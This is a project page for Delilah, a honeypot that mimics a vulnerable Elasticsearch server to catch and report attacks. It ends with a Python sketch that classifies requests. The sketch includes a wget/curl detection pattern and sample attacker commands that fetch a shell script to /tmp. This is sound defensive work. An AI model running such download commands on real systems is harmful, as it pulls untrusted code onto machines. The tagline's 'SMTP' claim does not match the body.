
Delilah Honeypot
#Threat Defense #Honeypots
A PoC tool for utilizing GPT3.5 in developing an SMTP honeypot.
Delilah: A Honeypot System for Detecting Attacks
Delilah is a honeypot system that draws inspiration from Jordan Wright’s Elastichoney. It is designed to detect and identify various types of malicious activities, including attack commands, reconnaissance attempts, and download commands.
It functions as a vulnerable Elasticsearch instance that detects and identifies attack commands, reconnaissance attempts, and download commands. Whenever an attacker issues a download command, Delilah attempts to download the file that the attacker is trying to introduce onto the victim's system. When Delilah detects an attacker's commands, it sends a notification email to one or more specified email addresses, alerting analysts in real time to incoming attacks. Delilah offers a range of configurable parameters for simulating Elasticsearch instances, which makes it difficult for an attacker to realize they are interacting with a honeypot. Multiple Delilah nodes can be installed to create a network of sensors. To facilitate easier monitoring of the sensor network, analysts should use the appropriate tools.
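The triage described above (reconnaissance, attack command, download command) can be sketched as follows. This is an added example, not Delilah's code: the regexes, the endpoint prefixes and the `fetchable` guard are assumptions chosen for illustration, and the sample requests are constructed.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Assumed heuristics for illustration; these are not Delilah's rules.
DOWNLOAD_RE = re.compile(r"\b(?:wget|curl)\b[^|;&]*?(https?://[^\s\"'\\;|&)]+)", re.I)
SCRIPT_RE = re.compile(r'"script(?:_fields)?"\s*:', re.I)
RECON_PREFIXES = ("/_nodes", "/_cluster", "/_cat")  # Elasticsearch info endpoints

def classify(method, path, body=""):
    """Label one request as download, attack, recon or other; return (label, urls)."""
    urls = DOWNLOAD_RE.findall(body)
    if urls:
        return "download", urls
    if SCRIPT_RE.search(body):
        return "attack", []
    p = urlsplit(path).path.rstrip("/") or "/"
    if method == "GET" and (p == "/" or p.startswith(RECON_PREFIXES)):
        return "recon", []
    return "other", []

def fetchable(url):
    """Refuse URLs that would point the sensor's downloader at non-public addresses."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        return ipaddress.ip_address(parts.hostname).is_global
    except ValueError:
        # A hostname: a real sensor must resolve it and re-check every address.
        return True

# Constructed sample requests (method, path, body).
SAMPLES = [
    ("GET", "/_nodes?pretty", ""),
    ("POST", "/_search", '{"script": "id"}'),
    ("POST", "/_search", '{"script": "wget http://files.example.net/a.sh -O /tmp/a.sh"}'),
    ("POST", "/_search", '{"script": "curl -o /tmp/b http://127.0.0.1:9200/b"}'),
]

def triage(samples=SAMPLES):
    """Return (label, [(url, fetch?)]) per request, as an alert email might summarise it."""
    out = []
    for method, path, body in samples:
        label, urls = classify(method, path, body)
        out.append((label, [(u, fetchable(u)) for u in urls]))
    return out

if __name__ == "__main__":
    for row in triage():
        print(row)
```

The last sample shows why a sensor that fetches attacker-supplied URLs needs the guard: without it, the download step can be pointed at the sensor's own loopback or internal addresses. Anything fetched should be stored for analysis and never executed.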